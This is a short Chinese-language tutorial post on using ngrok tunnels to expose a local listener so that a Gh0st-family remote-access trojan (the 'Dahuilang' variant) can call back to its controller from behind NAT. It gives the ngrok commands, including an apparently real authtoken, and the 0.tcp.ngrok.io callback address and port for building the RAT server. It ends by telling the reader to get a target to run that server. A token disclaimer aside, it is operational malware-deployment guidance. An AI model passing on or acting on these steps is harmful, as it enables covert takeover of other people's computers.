我们时常因为处于内网中没有办法直接让远控上线而烦恼,曾经用的花生売域名更新上线或者是路由器映射上线,反正我没用过花生売上线,我当年是直接在3322上面更新的外网IP,然后在本地设置我自身的路由器NAT。但是这一切随着Ngrok的到来而变的简单。
我在网上找的大灰狼远控,发现是带有后门的,所以必须在虚拟机运行。
本文只做网络技术研究学习,切勿使用本文内涉及的技术用于非法入侵!否则,后果自负!
一、什么是Ngrok?
ngrok通过安全隧道将NAT和防火墙后面的本地服务器暴露给公共互联网。
二、Ngrok优点与缺点
优点:极速建立隧道,一次设置,再次使用不折腾,只需要一条命令即可。
缺点:一旦ngork重新启动,那么外网端口就会变化,你就需要重新生成一次服务端。
三、Ngrok原理 示意图
四、实际操作演示
1、先到ngrok网站:https://ngrok.com/ 注册一个账号并登陆。
2、根据你的实际情况下载ngrok,下载地址:https://ngrok.com/download
3、解压之后,执行:
ngrok authtoken 241QzjrpoHhuaskLXPqLA_4BT5F3NKphbfZKfLGFc7
4、执行:
ngrok tcp 8002
5、Gh0st 生成的时候上线地址填 0.tcp.ngrok.io,端口填 13489。
Gh0st 是一种在互联网上被广泛传播的远控木马家族,因为其源代码开放,所以有各种五花八门的变种和改进版本,大灰狼是其中影响力较大的一个变种家族。
6、大灰狼客户端监听填 8002;
7、生成之后,看各位操作,把服务端让目标执行,就可以上线了。